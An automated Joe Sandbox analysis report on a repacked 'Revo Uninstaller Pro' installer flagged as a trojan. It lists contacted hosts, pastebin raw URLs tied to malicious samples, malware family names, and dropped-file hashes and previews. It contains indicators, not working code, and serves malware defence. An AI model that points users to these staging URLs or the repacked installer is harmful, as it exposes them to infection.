                                                                                                                                                                https://legal.opera.com/eula/computerssetup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                http://www.itl.nist.gov/fipspubs/fip180-1.htmruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                  104.20.3.235
                                                                                                                                                                  pastebin.comUnited States
                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                  107.167.96.36
                                                                                                                                                                  na-download.opera.comUnited States
                                                                                                                                                                  53755IOFLOODUSfalse
                                                                                                                                                                  194.87.189.43
                                                                                                                                                                  mail.repack.meRussian Federation
                                                                                                                                                                  197695AS-REGRUfalse
                                                                                                                                                                  107.167.96.38
                                                                                                                                                                  na-autoupdate.opera.comUnited States
                                                                                                                                                                  53755IOFLOODUSfalse
                                                                                                                                                                  107.167.96.39
                                                                                                                                                                  unknownUnited States
                                                                                                                                                                  53755IOFLOODUSfalse
                                                                                                                                                                  107.167.96.30
                                                                                                                                                                  trn.lb.opera.technologyUnited States
                                                                                                                                                                  53755IOFLOODUSfalse
                                                                                                                                                                  107.167.125.189
                                                                                                                                                                  submit-trn.osp.opera.softwareUnited States
                                                                                                                                                                  21837OPERASOFTWAREUSfalse
                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                  Analysis ID:1571786
                                                                                                                                                                  Start date and time:2024-12-09 17:51:31 +01:00
                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                  Overall analysis duration:0h 12m 49s
                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                  Report type:full
                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                  Run name:Run with higher sleep bypass
                                                                                                                                                                  Number of analysed new started processes analysed:33
                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                  Technologies:
                                                                                                                                                                  • HCA enabled
                                                                                                                                                                  • EGA enabled
                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                  Sample name:Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                  Detection:MAL
                                                                                                                                                                  Classification:mal44.troj.evad.winEXE@44/128@9/7
                                                                                                                                                                  EGA Information:
                                                                                                                                                                  • Successful, ratio: 62.5%
                                                                                                                                                                  HCA Information:
                                                                                                                                                                  • Successful, ratio: 95%
                                                                                                                                                                  • Number of executed functions: 376
                                                                                                                                                                  • Number of non-executed functions: 130
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.212.252.8, 23.212.252.40, 20.109.210.53, 13.107.246.63
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, e125010.dscd.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, v2.download3.operacdn.com.edgekey.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 1260 because it is empty
                                                                                                                                                                  • Execution Graph export aborted for target ruplp.exe, PID 1188 because there are no executed function
                                                                                                                                                                  • Execution Graph export aborted for target setup.exe, PID 2252 because there are no executed function
                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                  • VT rate limit hit for: Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                  No simulations
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  104.20.3.235cr_asm3.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                  gabe.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                  cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                  cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                  vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                  OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                  5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                  Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                  BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                                  sostener.vbsGet hashmaliciousNjratBrowse
                                                                                                                                                                  • pastebin.com/raw/V9y5Q5vv
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  submit-trn.osp.opera.softwarefile.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                                                                                                                                  • 107.167.125.189
                                                                                                                                                                  PDFViewer_46615443.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 107.167.125.189
                                                                                                                                                                  SecuriteInfo.com.Win64.PWSX-gen.7949.23910.exeGet hashmaliciousGluptebaBrowse
                                                                                                                                                                  • 107.167.125.189
                                                                                                                                                                  OperaSetup.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                  • 107.167.125.189
                                                                                                                                                                  OperaSetup.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                  • 107.167.125.189
                                                                                                                                                                  trn.lb.opera.technologyhttps://www.upload.ee/files/17435967/DeltaAirLines_t.delta.com.txt.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 107.167.96.30
                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                                                                                                                                  • 107.167.96.31
                                                                                                                                                                  PDFViewer_46615443.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 107.167.96.30
                                                                                                                                                                  pastebin.comrrats.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                  • 172.67.19.24
                                                                                                                                                                  Q8o0Mx52Fd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.20.3.235
                                                                                                                                                                  Q8o0Mx52Fd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.20.3.235
                                                                                                                                                                  Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  • 104.20.4.235
                                                                                                                                                                  Microsoft.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.20.3.235
                                                                                                                                                                  a9YMw44iQq.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                  • 172.67.19.24
                                                                                                                                                                  nlGOh9K5X5.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                  • 172.67.19.24
                                                                                                                                                                  cJ6xbAA5Rn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 172.67.19.24
                                                                                                                                                                  vortex.ps1Get hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                                                                                  • 104.20.3.235
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  CLOUDFLARENETUSSJqOoILabX.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                  • 104.21.16.9
                                                                                                                                                                  https://uhu145fc.s3.amazonaws.com/bf63.html?B3E2629E-DF5B-2F28-7322FD910FB23F54Get hashmaliciousPhisherBrowse
                                                                                                                                                                  • 104.17.25.14
                                                                                                                                                                  5EZLEXDveC.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                  • 104.21.43.156
                                                                                                                                                                  8GHb2yuPOk.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                  • 104.21.16.9
                                                                                                                                                                  Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                  • 104.17.25.14
                                                                                                                                                                  https://zfrmz.com/wE0Jw9HNvGeKZ1fn5cBUGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.17.25.14
                                                                                                                                                                  W7ZBbzV7A5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.26.3.46
                                                                                                                                                                  file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                  file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                  AS-REGRUcXjy5Y6dXX.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                  • 193.124.205.63
                                                                                                                                                                  SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                  • 194.58.112.174
                                                                                                                                                                  New Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                  • 31.31.196.17
                                                                                                                                                                  72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                  • 194.58.112.174
                                                                                                                                                                  attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                  • 31.31.196.17
                                                                                                                                                                  specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                  • 194.58.112.174
                                                                                                                                                                  Pre Alert PO TVKJEANSA00967.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                  • 194.58.112.174
                                                                                                                                                                  DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                  • 37.140.192.206
                                                                                                                                                                  Fi#U015f.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                  • 31.31.196.177
                                                                                                                                                                  IOFLOODUS06.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • 107.178.108.41
                                                                                                                                                                  sdfg.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • 107.178.108.41
                                                                                                                                                                  teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                                                                                                                  • 184.164.88.203
                                                                                                                                                                  https://www.upload.ee/files/17435967/DeltaAirLines_t.delta.com.txt.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 107.167.96.30
                                                                                                                                                                  nabarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 148.163.47.37
                                                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 148.163.93.46
                                                                                                                                                                  file.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                  • 148.163.93.46
                                                                                                                                                                  IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                  • 107.167.84.42
                                                                                                                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                  • 107.167.84.42
                                                                                                                                                                  IOFLOODUS06.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • 107.178.108.41
                                                                                                                                                                  sdfg.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • 107.178.108.41
                                                                                                                                                                  teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                                                                                                                  • 184.164.88.203
                                                                                                                                                                  https://www.upload.ee/files/17435967/DeltaAirLines_t.delta.com.txt.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 107.167.96.30
                                                                                                                                                                  nabarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 148.163.47.37
                                                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 148.163.93.46
                                                                                                                                                                  file.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                  • 148.163.93.46
                                                                                                                                                                  IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                  • 107.167.84.42
                                                                                                                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                  • 107.167.84.42
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19http://crissertaoericardo.com.br/images/document.pif.rarGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                  • 104.20.3.235
                                                                                                                                                                  • 107.167.96.36
                                                                                                                                                                  • 194.87.189.43
                                                                                                                                                                  • 107.167.96.38
                                                                                                                                                                  • 107.167.96.39
                                                                                                                                                                  • 107.167.96.30
                                                                                                                                                                  • 107.167.125.189
                                                                                                                                                                  tQoSuhQIdC.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.20.3.235
                                                                                                                                                                  • 107.167.96.36
                                                                                                                                                                  • 194.87.189.43
                                                                                                                                                                  • 107.167.96.38
                                                                                                                                                                  • 107.167.96.39
                                                                                                                                                                  • 107.167.96.30
                                                                                                                                                                  • 107.167.125.189
                                                                                                                                                                  A8Uynu9lwi.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.20.3.235
                                                                                                                                                                  • 107.167.96.36
                                                                                                                                                                  • 194.87.189.43
                                                                                                                                                                  • 107.167.96.38
                                                                                                                                                                  • 107.167.96.39
                                                                                                                                                                  • 107.167.96.30
                                                                                                                                                                  • 107.167.125.189
                                                                                                                                                                  MsmxWY8nj7.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                  • 104.20.3.235
                                                                                                                                                                  • 107.167.96.36
                                                                                                                                                                  • 194.87.189.43
                                                                                                                                                                  • 107.167.96.38
                                                                                                                                                                  • 107.167.96.39
                                                                                                                                                                  • 107.167.96.30
                                                                                                                                                                  • 107.167.125.189
                                                                                                                                                                  ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                  • 104.20.3.235
                                                                                                                                                                  • 107.167.96.36
                                                                                                                                                                  • 194.87.189.43
                                                                                                                                                                  • 107.167.96.38
                                                                                                                                                                  • 107.167.96.39
                                                                                                                                                                  • 107.167.96.30
                                                                                                                                                                  • 107.167.125.189
                                                                                                                                                                  Lenticels.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                  • 104.20.3.235
                                                                                                                                                                  • 107.167.96.36
                                                                                                                                                                  • 194.87.189.43
                                                                                                                                                                  • 107.167.96.38
                                                                                                                                                                  • 107.167.96.39
                                                                                                                                                                  • 107.167.96.30
                                                                                                                                                                  • 107.167.125.189
                                                                                                                                                                  Request for Quotation New collaboration.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                  • 104.20.3.235
                                                                                                                                                                  • 107.167.96.36
                                                                                                                                                                  • 194.87.189.43
                                                                                                                                                                  • 107.167.96.38
                                                                                                                                                                  • 107.167.96.39
                                                                                                                                                                  • 107.167.96.30
                                                                                                                                                                  • 107.167.125.189
                                                                                                                                                                  REQUEST FOR QUOATION AND PRICES 01306-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                  • 104.20.3.235
                                                                                                                                                                  • 107.167.96.36
                                                                                                                                                                  • 194.87.189.43
                                                                                                                                                                  • 107.167.96.38
                                                                                                                                                                  • 107.167.96.39
                                                                                                                                                                  • 107.167.96.30
                                                                                                                                                                  • 107.167.125.189
                                                                                                                                                                  cllmxIZWcQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 104.20.3.235
                                                                                                                                                                  • 107.167.96.36
                                                                                                                                                                  • 194.87.189.43
                                                                                                                                                                  • 107.167.96.38
                                                                                                                                                                  • 107.167.96.39
                                                                                                                                                                  • 107.167.96.30
                                                                                                                                                                  • 107.167.125.189
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:Non-ISO extended-ASCII text, with very long lines (793), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5590
                                                                                                                                                                          Entropy (8bit):5.036330960659774
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:ehs4nT03+Pq7sWchbo1Z18HOfMyLGt5aYbCMKgMbl5KTp9P3Rz3lwemW3bk:8HAEq76ubCufst5abLge5KXPJlQQk
                                                                                                                                                                          MD5:BB9B516486F1A5C2D5AA127355164604
                                                                                                                                                                          SHA1:712191F838CD5E95F5EC9A32ECD937F1B0119182
                                                                                                                                                                          SHA-256:0BDF49709C28EDEF8257F7FCB902314181C4FC66C8C3190EB55A30105487A9AC
                                                                                                                                                                          SHA-512:B29747BEDBC3B14E315FA216CE5ABEB222C354FA6A96055963666EFA3EAD39BF85DF2AB29015EFCB673503337B3BAA255D9AC396C0A503EA6F61B53198671EE8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:REVO UNINSTALLER PRO LICENSE AGREEMENT AND COPYRIGHT..========================....IMPORTANT: YOU SHOULD CAREFULLY READ THE FOLLOWING LICENSE AGREEMENT. IT WILL BE NECESSARY FOR YOU TO AGREE TO BE BOUND BY THE TERMS OF THIS AGREEMENT BEFORE BEING PERMITTED TO CONTINUE TO INSTALL THE PRODUCT.....This license Agreement is a legal agreement between You (either personal or corporate) and VS REVO GROUP, the developer of the SOFTWARE .Revo Uninstaller Pro.". "VS REVO GROUP" means the developer of the "Revo Uninstaller Pro" software product, VS Revo Group, Ltd. SOFTWARE means Revo Uninstaller Pro product and related explanatory materials. The term "SOFTWARE" also shall include any upgrades, modified versions or updates of the Software licensed to You by VS REVO GROUP.....YOU AGREE TO BE BOUND BY THE TERMS OF THIS LICENSE AGREEMENT AND THE LIMITATIONS OF YOUR LICENSE BY INSTALLING, COPYING, DISTRIBUTING OR OTHERWISE USING the SOFTWARE. IF YOU DO NOT AGREE, DO NOT INSTALL, DISTRIBUTE OR USE REVO
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):191968
                                                                                                                                                                          Entropy (8bit):6.198794572117837
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:7G5lIaj6Zx5+hKTTn6115xx/Nl19oyUBlBN0AZHVf+3S484:7uSDXb67bPng1G1
                                                                                                                                                                          MD5:8B9964E06195FD375D126B424E236F03
                                                                                                                                                                          SHA1:6F1741CFEB9FB70C34857DBBA3E063C88C3C32FA
                                                                                                                                                                          SHA-256:BDA04B693BFDEA86A7A3B47F2E4CEAE9CD9475C4E81B0AA73B70FD244A65F70F
                                                                                                                                                                          SHA-512:741019523B4C5F4EF9A7952172309B2D304A84CBD98FFF99A719105CC1938157EDB1691554A21B9DCD2B523C0F1AB0D37879DEEFC3B2FA5579C0D8C76CADE483
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious, Browse
                                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$..........y.uj*.uj*.uj*3.*.uj*3.*.uj*3.*.uj*.+i+.uj*.+o+.uj*.+n+.uj*b,o+.uj*...*.uj*...*.uj*...*.uj*.uk*&uj*.+n+.uj*.+o+.uj*.+j+.uj*.+.*.uj*.u.*.uj*.+h+.uj*Rich.uj*........PE..d....Jb.........." .....v...P.......{.......................................0......./.... .........................................pS.......T...........3...............5... ..,...0%..T...................(&..(....%...............................................text...8t.......v.................. ..`.rdata...............z..............@..@.data....!...p.......N..............@....pdata...............^..............@..@.gfids...............x..............@..@.tls.................z..............@....rsrc....3.......4...|..............@..@.reloc..,.... ......................@..B........................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PDF document, version 1.7, 77 pages
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2172747
                                                                                                                                                                          Entropy (8bit):7.967339088421113
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:mjdEod4PD0ZuCBbVRBJHRn/kqZebFV46kT0Tw7AKlPm+JRJ:mZEo2DU1f98qZebFV4gT+R1muJ
                                                                                                                                                                          MD5:7012BC3336963CBF739BDB61C2226041
                                                                                                                                                                          SHA1:28D5BD206674B796AD22975E0023ADAFF074E163
                                                                                                                                                                          SHA-256:AA262DB5124FAD214251F81DFA44C19638B785D0E21C395DFDBCB91C37C3376F
                                                                                                                                                                          SHA-512:004E612C761C91509320983FCEE6F5B0E58136F686874DDAD39937611E6FF76111350B5D3EBA44FE7AF49E71000695B1773AA831731CEB08EDDBE37C0B70386C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(bg) /Metadata 383 0 R/ViewerPreferences 384 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 77/Kids[ 3 0 R 20 0 R 39 0 R 47 0 R 49 0 R 50 0 R 51 0 R 53 0 R 54 0 R 57 0 R 59 0 R 61 0 R 63 0 R 64 0 R 65 0 R 66 0 R 67 0 R 69 0 R 71 0 R 73 0 R 74 0 R 76 0 R 79 0 R 81 0 R 82 0 R 83 0 R 85 0 R 86 0 R 88 0 R 90 0 R 92 0 R 94 0 R 95 0 R 97 0 R 98 0 R 99 0 R 101 0 R 102 0 R 103 0 R 105 0 R 106 0 R 108 0 R 109 0 R 110 0 R 111 0 R 112 0 R 113 0 R 114 0 R 115 0 R 116 0 R 117 0 R 118 0 R 119 0 R 120 0 R 121 0 R 122 0 R 123 0 R 125 0 R 126 0 R 127 0 R 128 0 R 129 0 R 130 0 R 131 0 R 132 0 R 134 0 R 135 0 R 136 0 R 137 0 R 322 0 R 325 0 R 329 0 R 333 0 R 335 0 R 340 0 R 345 0 R 347 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</ExtGState<</GS5 5 0 R/GS8 8 0 R>>/Font<</F1 6 0 R/F2 9 0 R/F3 11 0 R/F4 13 0 R>>/XObject<</Image18 18 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Gr
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):9794808
                                                                                                                                                                          Entropy (8bit):6.9007098668528695
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:3dq5HiSQHu3a6F3+3gqVCnNqNt2A0p/5chEuuZkJaC:3dqtNk6UbhbaC
                                                                                                                                                                          MD5:D94CAA2ACB6EBAB90BF564AC6BFC1F05
                                                                                                                                                                          SHA1:965B4E3D1CF653ABC9C68736E5240FA3B50C2C46
                                                                                                                                                                          SHA-256:DB8B4EB11D18FD1DB9342DFC0155069289A4B0E6A9DF69520463F1224BC51C91
                                                                                                                                                                          SHA-512:3B24C4351177473D2BFD1CC4488EA9A5A5AEC2BB41801E70B4ACEFCE24C221B10CD491884CD1AA353D71365798FDEE11852F96813AD4468F7BE05787F1DB0AF3
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: 56F2F2548297D7B72AF40B7898D1DABE2DCB809038898.exe, Detection: malicious, Browse
                                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........w.............xL......xL..y...xL......[.......).........t.......w......................................b.........^...[.......^..............[.......Rich............PE..d...'..d..........#.......3..tb.....,H.........@.......................................... ...................................................F.......L...I...H..R...4...@............?.p.....................?.(.....?...............3.@............................text.....3.......3................. ..`.rdata.......3.......3.............@..@.data...@<...`F..N...FF.............@....pdata...R....H..T....G.............@..@.gfids..0.....K.......I.............@..@.giats........L.......K.............@..@.tls..........L.......K.............@....rsrc.....I...L...I...K.............@..@........................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):190640
                                                                                                                                                                          Entropy (8bit):6.421539474136109
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:OxneIw3rR+YT5J1zOpXJ5IevXr480/wqqpotGcGe9Nbms:OxBm9vOtr7r48Ct7x
                                                                                                                                                                          MD5:470F2FEABF6AD0A0EEDB02B02AD4C6E8
                                                                                                                                                                          SHA1:100887FC63BF34CAE420FFEED51900426B300CF7
                                                                                                                                                                          SHA-256:78288F4C89D635D0E213F3D2B9BD36D1EE4574CCFBA23E86BD900C7457E48318
                                                                                                                                                                          SHA-512:4FFD8CB2EB8AAE6CE50727937FE759D6CA70D125427FAC512C8DD5B7BF4F60D3EE92B3C5ABE14C1F1C4B4CBEA04F8217D3A4B075A510355A05299191089EA19D
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.&..wH..wH..wH....wH....wH....wH.<)K..wH.<)L..wH.<)M.!wH.....wH..wI.cwH..)A..wH..)...wH..)J..wH.Rich.wH.........PE..d......g..........".................$s.........@..........................................`..................................................w..P...............x........J......\....N..p...........................`O...............................................text............................... ..`.rdata..............................@..@.data................l..............@....pdata..x............x..............@..@.gfids..............................@..@.rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):25604296
                                                                                                                                                                          Entropy (8bit):6.723595463931162
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:196608:D8pA5h1COpxhZwpArAfpvuPTxhbmWqPWpyR1pOIIIIIIIIIIIIIIIIIIIIIIIIIh:gpA5h1nrhIAbFhlqPWpyR1pV
